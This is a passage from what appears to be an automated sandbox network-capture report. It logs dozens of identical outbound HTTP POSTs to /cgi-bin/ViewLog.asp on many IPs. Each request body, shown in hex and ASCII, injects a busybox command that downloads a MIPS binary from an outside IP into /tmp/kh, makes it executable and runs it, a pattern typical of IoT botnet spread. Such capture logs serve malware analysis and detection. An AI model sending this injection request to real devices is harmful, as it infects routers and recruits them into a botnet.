                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.694174051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              584192.168.2.136051294.120.32.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.361371040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.518210888 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.662223101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.694171906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              585192.168.2.135334294.120.154.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.361438990 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              586192.168.2.135927885.122.223.1348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.585217953 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              587192.168.2.134129262.72.166.1448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.623236895 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              588192.168.2.135432231.136.72.78080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.678302050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.750237942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.894238949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.926182985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              589192.168.2.135711285.245.193.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.693912029 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              590192.168.2.134924631.44.130.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.715506077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              591192.168.2.133702231.11.219.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.717915058 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              592192.168.2.135886485.201.172.658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.730915070 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              593192.168.2.133829494.72.88.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.749815941 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.958568096 CET194INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Cache-control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              594192.168.2.134937894.120.221.338080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.769078970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              595192.168.2.134498462.116.192.2528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.837994099 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.026376009 CET358INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:52 GMT
                                              Server: Apache
                                              Content-Length: 126
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>
                                              Nov 23, 2023 05:17:54.052015066 CET358INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:52 GMT
                                              Server: Apache
                                              Content-Length: 126
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              596192.168.2.133477231.136.51.1848080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:52.875565052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.446240902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.598227978 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.030224085 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.638212919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
